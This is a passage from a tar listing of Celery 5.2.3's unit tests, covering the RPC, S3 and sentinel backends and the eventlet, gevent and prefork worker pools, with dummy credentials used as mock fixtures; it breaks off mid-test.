'sentinel://:bosco@vandelay.com:123//1', app=self.app, ) assert x.connparams assert len(x.connparams['hosts']) == 1 assert x.connparams['hosts'][0]['host'] == 'vandelay.com' assert x.connparams['hosts'][0]['db'] == 1 assert x.connparams['hosts'][0]['port'] == 123 assert x.connparams['hosts'][0]['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30.0 assert x.connparams['socket_connect_timeout'] == 100.0 assert x.connparams['ssl_cert_reqs'] == ssl.CERT_REQUIRED assert x.connparams['ssl_ca_certs'] == '/path/to/ca.crt' assert x.connparams['ssl_certfile'] == '/path/to/client.crt' assert x.connparams['ssl_keyfile'] == '/path/to/client.key' from celery.backends.redis import SentinelManagedSSLConnection assert x.connparams['connection_class'] is SentinelManagedSSLConnection ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_rpc.py0000664000175000017500000000714500000000000020075 0ustar00asifasif00000000000000import uuid from unittest.mock import Mock, patch import pytest from celery import chord, group from celery._state import _task_stack from celery.backends.rpc import RPCBackend class test_RPCResultConsumer: def get_backend(self): return RPCBackend(app=self.app) def get_consumer(self): return self.get_backend().result_consumer def test_drain_events_before_start(self): consumer = self.get_consumer() # drain_events shouldn't crash when called before start consumer.drain_events(0.001) class test_RPCBackend: def setup(self): self.b = RPCBackend(app=self.app) def test_oid(self): oid = self.b.oid oid2 = self.b.oid assert uuid.UUID(oid) assert oid == oid2 assert oid == self.app.thread_oid def test_oid_threads(self): # Verify that two RPC backends executed in different threads # has different oid. oid = self.b.oid from concurrent.futures import ThreadPoolExecutor with ThreadPoolExecutor(max_workers=1) as executor: future = executor.submit(lambda: RPCBackend(app=self.app).oid) thread_oid = future.result() assert uuid.UUID(oid) assert uuid.UUID(thread_oid) assert oid == self.app.thread_oid assert thread_oid != oid def test_interface(self): self.b.on_reply_declare('task_id') def test_ensure_chords_allowed(self): with pytest.raises(NotImplementedError): self.b.ensure_chords_allowed() def test_apply_chord(self): with pytest.raises(NotImplementedError): self.b.apply_chord(self.app.GroupResult(), None) @pytest.mark.celery(result_backend='rpc') def test_chord_raises_error(self): with pytest.raises(NotImplementedError): chord(self.add.s(i, i) for i in range(10))(self.add.s([2])) @pytest.mark.celery(result_backend='rpc') def test_chain_with_chord_raises_error(self): with pytest.raises(NotImplementedError): (self.add.s(2, 2) | group(self.add.s(2, 2), self.add.s(5, 6)) | self.add.s()).delay() def test_destination_for(self): req = Mock(name='request') req.reply_to = 'reply_to' req.correlation_id = 'corid' assert self.b.destination_for('task_id', req) == ('reply_to', 'corid') task = Mock() _task_stack.push(task) try: task.request.reply_to = 'reply_to' task.request.correlation_id = 'corid' assert self.b.destination_for('task_id', None) == ( 'reply_to', 'corid', ) finally: _task_stack.pop() with pytest.raises(RuntimeError): self.b.destination_for('task_id', None) def test_binding(self): queue = self.b.binding assert queue.name == self.b.oid assert queue.exchange == self.b.exchange assert queue.routing_key == self.b.oid assert not queue.durable assert queue.auto_delete def test_create_binding(self): assert self.b._create_binding('id') == self.b.binding def test_on_task_call(self): with patch('celery.backends.rpc.maybe_declare') as md: with self.app.amqp.producer_pool.acquire() as prod: self.b.on_task_call(prod, 'task_id'), md.assert_called_with( self.b.binding(prod.channel), retry=True, ) def test_create_exchange(self): ex = self.b._create_exchange('name') assert isinstance(ex, self.b.Exchange) assert ex.name == '' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_s3.py0000664000175000017500000001477600000000000017646 0ustar00asifasif00000000000000from unittest.mock import patch import boto3 import pytest from botocore.exceptions import ClientError from moto import mock_s3 from celery import states from celery.backends.s3 import S3Backend from celery.exceptions import ImproperlyConfigured class test_S3Backend: @patch('botocore.credentials.CredentialResolver.load_credentials') def test_with_missing_aws_credentials(self, mock_load_credentials): self.app.conf.s3_access_key_id = None self.app.conf.s3_secret_access_key = None self.app.conf.s3_bucket = 'bucket' mock_load_credentials.return_value = None with pytest.raises(ImproperlyConfigured, match="Missing aws s3 creds"): S3Backend(app=self.app) @patch('botocore.credentials.CredentialResolver.load_credentials') def test_with_no_credentials_in_config_attempts_to_load_credentials(self, mock_load_credentials): self.app.conf.s3_access_key_id = None self.app.conf.s3_secret_access_key = None self.app.conf.s3_bucket = 'bucket' S3Backend(app=self.app) mock_load_credentials.assert_called_once() @patch('botocore.credentials.CredentialResolver.load_credentials') def test_with_credentials_in_config_does_not_search_for_credentials(self, mock_load_credentials): self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' S3Backend(app=self.app) mock_load_credentials.assert_not_called() def test_with_no_given_bucket(self): self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = None with pytest.raises(ImproperlyConfigured, match='Missing bucket name'): S3Backend(app=self.app) @pytest.mark.parametrize('aws_region', [None, 'us-east-1'], ids=['No given aws region', 'Specific aws region']) @patch('celery.backends.s3.boto3') def test_it_creates_an_aws_s3_connection(self, mock_boto3, aws_region): self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' self.app.conf.s3_region = aws_region S3Backend(app=self.app) mock_boto3.Session.assert_called_once_with( aws_access_key_id='somekeyid', aws_secret_access_key='somesecret', region_name=aws_region) @pytest.mark.parametrize('endpoint_url', [None, 'https://custom.s3'], ids=['No given endpoint url', 'Custom endpoint url']) @patch('celery.backends.s3.boto3') def test_it_creates_an_aws_s3_resource(self, mock_boto3, endpoint_url): self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' self.app.conf.s3_endpoint_url = endpoint_url S3Backend(app=self.app) mock_boto3.Session().resource.assert_called_once_with( 's3', endpoint_url=endpoint_url) @pytest.mark.parametrize("key", ['uuid', b'uuid']) @mock_s3 def test_set_and_get_a_key(self, key): self._mock_s3_resource() self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' s3_backend = S3Backend(app=self.app) s3_backend._set_with_state(key, 'another_status', states.SUCCESS) assert s3_backend.get(key) == 'another_status' @mock_s3 def test_set_and_get_a_result(self): self._mock_s3_resource() self.app.conf.result_serializer = 'pickle' self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' s3_backend = S3Backend(app=self.app) s3_backend.store_result('foo', 'baar', 'STARTED') value = s3_backend.get_result('foo') assert value == 'baar' @mock_s3 def test_get_a_missing_key(self): self._mock_s3_resource() self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' s3_backend = S3Backend(app=self.app) result = s3_backend.get('uuidddd') assert result is None @patch('celery.backends.s3.boto3') def test_with_error_while_getting_key(self, mock_boto3): error = ClientError({'Error': {'Code': '403', 'Message': 'Permission denied'}}, 'error') mock_boto3.Session().resource().Object().load.side_effect = error self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' s3_backend = S3Backend(app=self.app) with pytest.raises(ClientError): s3_backend.get('uuidddd') @pytest.mark.parametrize("key", ['uuid', b'uuid']) @mock_s3 def test_delete_a_key(self, key): self._mock_s3_resource() self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' s3_backend = S3Backend(app=self.app) s3_backend._set_with_state(key, 'another_status', states.SUCCESS) assert s3_backend.get(key) == 'another_status' s3_backend.delete(key) assert s3_backend.get(key) is None @mock_s3 def test_with_a_non_existing_bucket(self): self._mock_s3_resource() self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket_not_exists' s3_backend = S3Backend(app=self.app) with pytest.raises(ClientError, match=r'.*The specified bucket does not exist'): s3_backend._set_with_state('uuid', 'another_status', states.SUCCESS) def _mock_s3_resource(self): # Create AWS s3 Bucket for moto. session = boto3.Session( aws_access_key_id='moto_key_id', aws_secret_access_key='moto_secret_key', region_name='us-east-1' ) s3 = session.resource('s3') s3.create_bucket(Bucket='bucket') ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7997568 celery-5.2.3/t/unit/bin/0000775000175000017500000000000000000000000014667 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/bin/__init__.py0000664000175000017500000000000000000000000016766 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/bin/celery.py0000664000175000017500000000002200000000000016516 0ustar00asifasif00000000000000# here for a test ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7997568 celery-5.2.3/t/unit/bin/proj/0000775000175000017500000000000000000000000015641 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/bin/proj/__init__.py0000664000175000017500000000010000000000000017741 0ustar00asifasif00000000000000from celery import Celery hello = Celery(set_as_current=False) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/bin/proj/app.py0000664000175000017500000000007600000000000016776 0ustar00asifasif00000000000000from celery import Celery app = Celery(set_as_current=False) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/bin/proj/app2.py0000664000175000017500000000003400000000000017052 0ustar00asifasif00000000000000import celery # noqa: F401 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/bin/test_multi.py0000664000175000017500000000000000000000000017420 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.807757 celery-5.2.3/t/unit/concurrency/0000775000175000017500000000000000000000000016451 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/__init__.py0000664000175000017500000000000000000000000020550 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/test_concurrency.py0000664000175000017500000001271100000000000022416 0ustar00asifasif00000000000000import importlib import os import sys from itertools import count from unittest.mock import Mock, patch import pytest from celery import concurrency from celery.concurrency.base import BasePool, apply_target from celery.exceptions import WorkerShutdown, WorkerTerminate class test_BasePool: def test_apply_target(self): scratch = {} counter = count(0) def gen_callback(name, retval=None): def callback(*args): scratch[name] = (next(counter), args) return retval return callback apply_target(gen_callback('target', 42), args=(8, 16), callback=gen_callback('callback'), accept_callback=gen_callback('accept_callback')) assert scratch['target'] == (1, (8, 16)) assert scratch['callback'] == (2, (42,)) pa1 = scratch['accept_callback'] assert pa1[0] == 0 assert pa1[1][0] == os.getpid() assert pa1[1][1] # No accept callback scratch.clear() apply_target(gen_callback('target', 42), args=(8, 16), callback=gen_callback('callback'), accept_callback=None) assert scratch == { 'target': (3, (8, 16)), 'callback': (4, (42,)), } def test_apply_target__propagate(self): target = Mock(name='target') target.side_effect = KeyError() with pytest.raises(KeyError): apply_target(target, propagate=(KeyError,)) def test_apply_target__raises(self): target = Mock(name='target') target.side_effect = KeyError() with pytest.raises(KeyError): apply_target(target) def test_apply_target__raises_WorkerShutdown(self): target = Mock(name='target') target.side_effect = WorkerShutdown() with pytest.raises(WorkerShutdown): apply_target(target) def test_apply_target__raises_WorkerTerminate(self): target = Mock(name='target') target.side_effect = WorkerTerminate() with pytest.raises(WorkerTerminate): apply_target(target) def test_apply_target__raises_BaseException(self): target = Mock(name='target') callback = Mock(name='callback') target.side_effect = BaseException() apply_target(target, callback=callback) callback.assert_called() @patch('celery.concurrency.base.reraise') def test_apply_target__raises_BaseException_raises_else(self, reraise): target = Mock(name='target') callback = Mock(name='callback') reraise.side_effect = KeyError() target.side_effect = BaseException() with pytest.raises(KeyError): apply_target(target, callback=callback) callback.assert_not_called() def test_does_not_debug(self): x = BasePool(10) x._does_debug = False x.apply_async(object) def test_num_processes(self): assert BasePool(7).num_processes == 7 def test_interface_on_start(self): BasePool(10).on_start() def test_interface_on_stop(self): BasePool(10).on_stop() def test_interface_on_apply(self): BasePool(10).on_apply() def test_interface_info(self): assert BasePool(10).info == { 'max-concurrency': 10, } def test_interface_flush(self): assert BasePool(10).flush() is None def test_active(self): p = BasePool(10) assert not p.active p._state = p.RUN assert p.active def test_restart(self): p = BasePool(10) with pytest.raises(NotImplementedError): p.restart() def test_interface_on_terminate(self): p = BasePool(10) p.on_terminate() def test_interface_terminate_job(self): with pytest.raises(NotImplementedError): BasePool(10).terminate_job(101) def test_interface_did_start_ok(self): assert BasePool(10).did_start_ok() def test_interface_register_with_event_loop(self): assert BasePool(10).register_with_event_loop(Mock()) is None def test_interface_on_soft_timeout(self): assert BasePool(10).on_soft_timeout(Mock()) is None def test_interface_on_hard_timeout(self): assert BasePool(10).on_hard_timeout(Mock()) is None def test_interface_close(self): p = BasePool(10) p.on_close = Mock() p.close() assert p._state == p.CLOSE p.on_close.assert_called_with() def test_interface_no_close(self): assert BasePool(10).on_close() is None class test_get_available_pool_names: def test_no_concurrent_futures__returns_no_threads_pool_name(self): expected_pool_names = ( 'prefork', 'eventlet', 'gevent', 'solo', 'processes', ) with patch.dict(sys.modules, {'concurrent.futures': None}): importlib.reload(concurrency) assert concurrency.get_available_pool_names() == expected_pool_names def test_concurrent_futures__returns_threads_pool_name(self): expected_pool_names = ( 'prefork', 'eventlet', 'gevent', 'solo', 'processes', 'threads', ) with patch.dict(sys.modules, {'concurrent.futures': Mock()}): importlib.reload(concurrency) assert concurrency.get_available_pool_names() == expected_pool_names ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/test_eventlet.py0000664000175000017500000001103400000000000021707 0ustar00asifasif00000000000000import sys from unittest.mock import Mock, patch import pytest pytest.importorskip('eventlet') from greenlet import GreenletExit # noqa import t.skip # noqa from celery.concurrency.eventlet import TaskPool, Timer, apply_target # noqa eventlet_modules = ( 'eventlet', 'eventlet.debug', 'eventlet.greenthread', 'eventlet.greenpool', 'greenlet', ) @t.skip.if_pypy class EventletCase: def setup(self): self.patching.modules(*eventlet_modules) def teardown(self): for mod in [mod for mod in sys.modules if mod.startswith('eventlet')]: try: del(sys.modules[mod]) except KeyError: pass class test_aaa_eventlet_patch(EventletCase): def test_aaa_is_patched(self): with patch('eventlet.monkey_patch', create=True) as monkey_patch: from celery import maybe_patch_concurrency maybe_patch_concurrency(['x', '-P', 'eventlet']) monkey_patch.assert_called_with() @patch('eventlet.debug.hub_blocking_detection', create=True) @patch('eventlet.monkey_patch', create=True) def test_aaa_blockdetecet( self, monkey_patch, hub_blocking_detection, patching): patching.setenv('EVENTLET_NOBLOCK', '10.3') from celery import maybe_patch_concurrency maybe_patch_concurrency(['x', '-P', 'eventlet']) monkey_patch.assert_called_with() hub_blocking_detection.assert_called_with(10.3, 10.3) class test_Timer(EventletCase): @pytest.fixture(autouse=True) def setup_patches(self, patching): self.spawn_after = patching('eventlet.greenthread.spawn_after') self.GreenletExit = patching('greenlet.GreenletExit') def test_sched(self): x = Timer() x.GreenletExit = KeyError entry = Mock() g = x._enter(1, 0, entry) assert x.queue x._entry_exit(g, entry) g.wait.side_effect = KeyError() x._entry_exit(g, entry) entry.cancel.assert_called_with() assert not x._queue x._queue.add(g) x.clear() x._queue.add(g) g.cancel.side_effect = KeyError() x.clear() def test_cancel(self): x = Timer() tref = Mock(name='tref') x.cancel(tref) tref.cancel.assert_called_with() x.GreenletExit = KeyError tref.cancel.side_effect = KeyError() x.cancel(tref) class test_TaskPool(EventletCase): @pytest.fixture(autouse=True) def setup_patches(self, patching): self.GreenPool = patching('eventlet.greenpool.GreenPool') self.greenthread = patching('eventlet.greenthread') def test_pool(self): x = TaskPool() x.on_start() x.on_stop() x.on_apply(Mock()) x._pool = None x.on_stop() assert len(x._pool_map.keys()) == 1 assert x.getpid() @patch('celery.concurrency.eventlet.base') def test_apply_target(self, base): apply_target(Mock(), getpid=Mock()) base.apply_target.assert_called() def test_grow(self): x = TaskPool(10) x._pool = Mock(name='_pool') x.grow(2) assert x.limit == 12 x._pool.resize.assert_called_with(12) def test_shrink(self): x = TaskPool(10) x._pool = Mock(name='_pool') x.shrink(2) assert x.limit == 8 x._pool.resize.assert_called_with(8) def test_get_info(self): x = TaskPool(10) x._pool = Mock(name='_pool') assert x._get_info() == { 'max-concurrency': 10, 'free-threads': x._pool.free(), 'running-threads': x._pool.running(), } def test_terminate_job(self): func = Mock() pool = TaskPool(10) pool.on_start() pool.on_apply(func) assert len(pool._pool_map.keys()) == 1 pid = list(pool._pool_map.keys())[0] greenlet = pool._pool_map[pid] pool.terminate_job(pid) greenlet.link.assert_called_once() greenlet.kill.assert_called_once() def test_make_killable_target(self): def valid_target(): return "some result..." def terminating_target(): raise GreenletExit() assert TaskPool._make_killable_target(valid_target)() == "some result..." assert TaskPool._make_killable_target(terminating_target)() == (False, None, None) def test_cleanup_after_job_finish(self): testMap = {'1': None} TaskPool._cleanup_after_job_finish(None, testMap, '1') assert len(testMap) == 0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/test_gevent.py0000664000175000017500000000607400000000000021361 0ustar00asifasif00000000000000from unittest.mock import Mock from celery.concurrency.gevent import TaskPool, Timer, apply_timeout gevent_modules = ( 'gevent', 'gevent.greenlet', 'gevent.monkey', 'gevent.pool', 'gevent.signal', 'greenlet', ) class test_gevent_patch: def test_is_patched(self): self.patching.modules(*gevent_modules) patch_all = self.patching('gevent.monkey.patch_all') import gevent gevent.version_info = (1, 0, 0) from celery import maybe_patch_concurrency maybe_patch_concurrency(['x', '-P', 'gevent']) patch_all.assert_called() class test_Timer: def setup(self): self.patching.modules(*gevent_modules) self.greenlet = self.patching('gevent.greenlet') self.GreenletExit = self.patching('gevent.greenlet.GreenletExit') def test_sched(self): self.greenlet.Greenlet = object x = Timer() self.greenlet.Greenlet = Mock() x._Greenlet.spawn_later = Mock() x._GreenletExit = KeyError entry = Mock() g = x._enter(1, 0, entry) assert x.queue x._entry_exit(g) g.kill.assert_called_with() assert not x._queue x._queue.add(g) x.clear() x._queue.add(g) g.kill.side_effect = KeyError() x.clear() g = x._Greenlet() g.cancel() class test_TaskPool: def setup(self): self.patching.modules(*gevent_modules) self.spawn_raw = self.patching('gevent.spawn_raw') self.Pool = self.patching('gevent.pool.Pool') def test_pool(self): x = TaskPool() x.on_start() x.on_stop() x.on_apply(Mock()) x._pool = None x.on_stop() x._pool = Mock() x._pool._semaphore.counter = 1 x._pool.size = 1 x.grow() assert x._pool.size == 2 assert x._pool._semaphore.counter == 2 x.shrink() assert x._pool.size, 1 assert x._pool._semaphore.counter == 1 x._pool = [4, 5, 6] assert x.num_processes == 3 class test_apply_timeout: def test_apply_timeout(self): self.patching.modules(*gevent_modules) class Timeout(Exception): value = None def __init__(self, value): self.__class__.value = value def __enter__(self): return self def __exit__(self, *exc_info): pass timeout_callback = Mock(name='timeout_callback') apply_target = Mock(name='apply_target') apply_timeout( Mock(), timeout=10, callback=Mock(name='callback'), timeout_callback=timeout_callback, apply_target=apply_target, Timeout=Timeout, ) assert Timeout.value == 10 apply_target.assert_called() apply_target.side_effect = Timeout(10) apply_timeout( Mock(), timeout=10, callback=Mock(), timeout_callback=timeout_callback, apply_target=apply_target, Timeout=Timeout, ) timeout_callback.assert_called_with(False, 10) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/test_pool.py0000664000175000017500000000344600000000000021042 0ustar00asifasif00000000000000import itertools import time import pytest from billiard.einfo import ExceptionInfo pytest.importorskip('multiprocessing') def do_something(i): return i * i def long_something(): time.sleep(1) def raise_something(i): try: raise KeyError('FOO EXCEPTION') except KeyError: return ExceptionInfo() class test_TaskPool: def setup(self): from celery.concurrency.prefork import TaskPool self.TaskPool = TaskPool def test_attrs(self): p = self.TaskPool(2) assert p.limit == 2 assert p._pool is None def x_apply(self): p = self.TaskPool(2) p.start() scratchpad = {} proc_counter = itertools.count() def mycallback(ret_value): process = next(proc_counter) scratchpad[process] = {} scratchpad[process]['ret_value'] = ret_value myerrback = mycallback res = p.apply_async(do_something, args=[10], callback=mycallback) res2 = p.apply_async(raise_something, args=[10], errback=myerrback) res3 = p.apply_async(do_something, args=[20], callback=mycallback) assert res.get() == 100 time.sleep(0.5) assert scratchpad.get(0)['ret_value'] == 100 assert isinstance(res2.get(), ExceptionInfo) assert scratchpad.get(1) time.sleep(1) assert isinstance(scratchpad[1]['ret_value'], ExceptionInfo) assert scratchpad[1]['ret_value'].exception.args == ('FOO EXCEPTION',) assert res3.get() == 400 time.sleep(0.5) assert scratchpad.get(2)['ret_value'] == 400 res3 = p.apply_async(do_something, args=[30], callback=mycallback) assert res3.get() == 900 time.sleep(0.5) assert scratchpad.get(3)['ret_value'] == 900 p.stop() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/t/unit/concurrency/test_prefork.py0000664000175000017500000003630200000000000021536 0ustar00asifasif00000000000000import errno import os import socket from itertools import cycle from unittest.mock import Mock, patch import pytest import t.skip from celery.app.defaults import DEFAULTS from celery.concurrency.asynpool import iterate_file_descriptors_safely from celery.utils.collections import AttributeDict from celery.utils.functional import noop from celery.utils.objects import Bunch try: from celery.concurrency import asynpool from celery.concurrency import prefork as mp except ImportError: class _mp: RUN = 0x1 class TaskPool: _pool = Mock() def __init__(self, *args, **kwargs): pass def start(self): pass def stop(self): pass def apply_async(self, *args, **kwargs): pass mp = _mp() asynpool = None class MockResult: def __init__(self, value, pid): self.value = value self.pid = pid def worker_pids(self): return [self.pid] def get(self): return self.value @patch('celery.platforms.set_mp_process_title') class test_process_initializer: @staticmethod def Loader(*args, **kwargs): loader = Mock(*args, **kwargs) loader.conf = {} loader.override_backends = {} return loader @patch('celery.platforms.signals') def test_process_initializer(self, _signals, set_mp_process_title, restore_logging): from celery import signals from celery._state import _tls from celery.concurrency.prefork import (WORKER_SIGIGNORE, WORKER_SIGRESET, process_initializer) on_worker_process_init = Mock() signals.worker_process_init.connect(on_worker_process_init) with self.Celery(loader=self.Loader) as app: app.conf = AttributeDict(DEFAULTS) process_initializer(app, 'awesome.worker.com') _signals.ignore.assert_any_call(*WORKER_SIGIGNORE) _signals.reset.assert_any_call(*WORKER_SIGRESET) assert app.loader.init_worker.call_count on_worker_process_init.assert_called() assert _tls.current_app is app set_mp_process_title.assert_called_with( 'celeryd', hostname='awesome.worker.com', ) with patch('celery.app.trace.setup_worker_optimizations') as S: os.environ['FORKED_BY_MULTIPROCESSING'] = '1' try: process_initializer(app, 'luke.worker.com') S.assert_called_with(app, 'luke.worker.com') finally: os.environ.pop('FORKED_BY_MULTIPROCESSING', None) os.environ['CELERY_LOG_FILE'] = 'worker%I.log' app.log.setup = Mock(name='log_setup') try: process_initializer(app, 'luke.worker.com') finally: os.environ.pop('CELERY_LOG_FILE', None) @patch('celery.platforms.set_pdeathsig') def test_pdeath_sig(self, _set_pdeathsig, set_mp_process_title, restore_logging): from celery import signals on_worker_process_init = Mock() signals.worker_process_init.connect(on_worker_process_init) from celery.concurrency.prefork import process_initializer with self.Celery(loader=self.Loader) as app: app.conf = AttributeDict(DEFAULTS) process_initializer(app, 'awesome.worker.com') _set_pdeathsig.assert_called_once_with('SIGKILL') class test_process_destructor: @patch('celery.concurrency.prefork.signals') def test_process_destructor(self, signals): mp.process_destructor(13, -3) signals.worker_process_shutdown.send.assert_called_with( sender=None, pid=13, exitcode=-3, ) class MockPool: started = False closed = False joined = False terminated = False _state = None def __init__(self, *args, **kwargs): self.started = True self._timeout_handler = Mock() self._result_handler = Mock() self.maintain_pool = Mock() self._state = mp.RUN self._processes = kwargs.get('processes') self._proc_alive_timeout = kwargs.get('proc_alive_timeout') self._pool = [Bunch(pid=i, inqW_fd=1, outqR_fd=2) for i in range(self._processes)] self._current_proc = cycle(range(self._processes)) def close(self): self.closed = True self._state = 'CLOSE' def join(self): self.joined = True def terminate(self): self.terminated = True def terminate_job(self, *args, **kwargs): pass def restart(self, *args, **kwargs): pass def handle_result_event(self, *args, **kwargs): pass def flush(self): pass def grow(self, n=1): self._processes += n def shrink(self, n=1): self._processes -= n def apply_async(self, *args, **kwargs): pass def register_with_event_loop(self, loop): pass class ExeMockPool(MockPool): def apply_async(self, target, args=(), kwargs={}, callback=noop): from threading import Timer res = target(*args, **kwargs) Timer(0.1, callback, (res,)).start() return MockResult(res, next(self._current_proc)) class TaskPool(mp.TaskPool): Pool = BlockingPool = MockPool class ExeMockTaskPool(mp.TaskPool): Pool = BlockingPool = ExeMockPool @t.skip.if_win32 class test_AsynPool: def setup(self): pytest.importorskip('multiprocessing') def test_gen_not_started(self): def gen(): yield 1 yield 2 g = gen() assert asynpool.gen_not_started(g) next(g) assert not asynpool.gen_not_started(g) list(g) assert not asynpool.gen_not_started(g) @patch('select.select', create=True) def test_select(self, __select): ebadf = socket.error() ebadf.errno = errno.EBADF with patch('select.poll', create=True) as poller: poll = poller.return_value = Mock(name='poll.poll') poll.return_value = {3}, set(), 0 assert asynpool._select({3}, poll=poll) == ({3}, set(), 0) poll.return_value = {3}, set(), 0 assert asynpool._select({3}, None, {3}, poll=poll) == ( {3}, set(), 0, ) eintr = socket.error() eintr.errno = errno.EINTR poll.side_effect = eintr readers = {3} assert asynpool._select(readers, poll=poll) == (set(), set(), 1) assert 3 in readers with patch('select.poll', create=True) as poller: poll = poller.return_value = Mock(name='poll.poll') poll.side_effect = ebadf with patch('select.select') as selcheck: selcheck.side_effect = ebadf readers = {3} assert asynpool._select(readers, poll=poll) == ( set(), set(), 1, ) assert 3 not in readers with patch('select.poll', create=True) as poller: poll = poller.return_value = Mock(name='poll.poll') poll.side_effect = MemoryError() with pytest.raises(MemoryError): asynpool._select({1}, poll=poll) with patch('select.poll', create=True) as poller: poll = poller.return_value = Mock(name='poll.poll') with patch('select.select') as selcheck: def se(*args): selcheck.side_effect = MemoryError() raise ebadf poll.side_effect = se with pytest.raises(MemoryError): asynpool._select({3}, poll=poll) with patch('select.poll', create=True) as poller: poll = poller.return_value = Mock(name='poll.poll') with patch('select.select') as selcheck: def se2(*args): selcheck.side_effect = socket.error() selcheck.side_effect.errno = 1321 raise ebadf poll.side_effect = se2 with pytest.raises(socket.error): asynpool._select({3}, poll=poll) with patch('select.poll', create=True) as poller: poll = poller.return_value = Mock(name='poll.poll') poll.side_effect = socket.error() poll.side_effect.errno = 34134 with pytest.raises(socket.error): asynpool._select({3}, poll=poll) def test_promise(self): fun = Mock() x = asynpool.promise(fun, (1,), {'foo': 1}) x() assert x.ready fun.assert_called_with(1, foo=1) def test_Worker(self): w = asynpool.Worker(Mock(), Mock()) w.on_loop_start(1234) w.outq.put.assert_called_with((asynpool.WORKER_UP, (1234,))) def test_iterate_file_descriptors_safely_source_data_list(self): # Given: a list of integers that could be file descriptors fd_iter = [1, 2, 3, 4, 5] # Given: a mock hub method that does nothing to call def _fake_hub(*args, **kwargs): raise OSError # When Calling the helper to iterate_file_descriptors_safely iterate_file_descriptors_safely( fd_iter, fd_iter, _fake_hub, "arg1", "arg2", kw1="kw1", kw2="kw2", ) # Then: all items were removed from the managed data source assert fd_iter == [], "Expected all items removed from managed list" def test_iterate_file_descriptors_safely_source_data_set(self): # Given: a list of integers that could be file descriptors fd_iter = {1, 2, 3, 4, 5} # Given: a mock hub method that does nothing to call def _fake_hub(*args, **kwargs): raise OSError # When Calling the helper to iterate_file_descriptors_safely iterate_file_descriptors_safely( fd_iter, fd_iter, _fake_hub, "arg1", "arg2", kw1="kw1", kw2="kw2", ) # Then: all items were removed from the managed data source assert fd_iter == set(), "Expected all items removed from managed set" def test_iterate_file_descriptors_safely_source_data_dict(self): # Given: a list of integers that could be file descriptors fd_iter = {1: 1, 2: 2, 3: 3, 4: 4, 5: 5} # Given: a mock hub method that does nothing to call def _fake_hub(*args, **kwargs): raise OSError # When Calling the helper to iterate_file_descriptors_safely iterate_file_descriptors_safely( fd_iter, fd_iter, _fake_hub, "arg1", "arg2", kw1="kw1", kw2="kw2", ) # Then: all items were removed from the managed data source assert fd_iter == {}, "Expected all items removed from managed dict" def test_register_with_event_loop__no_on_tick_dupes(self): """Ensure AsynPool's register_with_event_loop only registers on_poll_start in the event loop the first time it's called. This prevents a leak when the Consumer is restarted. """ pool = asynpool.AsynPool(threads=False) hub = Mock(name='hub') pool.register_with_event_loop(hub) pool.register_with_event_loop(hub) hub.on_tick.add.assert_called_once() @t.skip.if_win32 class test_ResultHandler: def setup(self): pytest.importorskip('multiprocessing') def test_process_result(self): x = asynpool.ResultHandler( Mock(), Mock(), {}, Mock(), Mock(), Mock(), Mock(), Mock(), fileno_to_outq={}, on_process_alive=Mock(), on_job_ready=Mock(), ) assert x hub = Mock(name='hub') recv = x._recv_message = Mock(name='recv_message') recv.return_value = iter([]) x.on_state_change = Mock() x.register_with_event_loop(hub) proc = 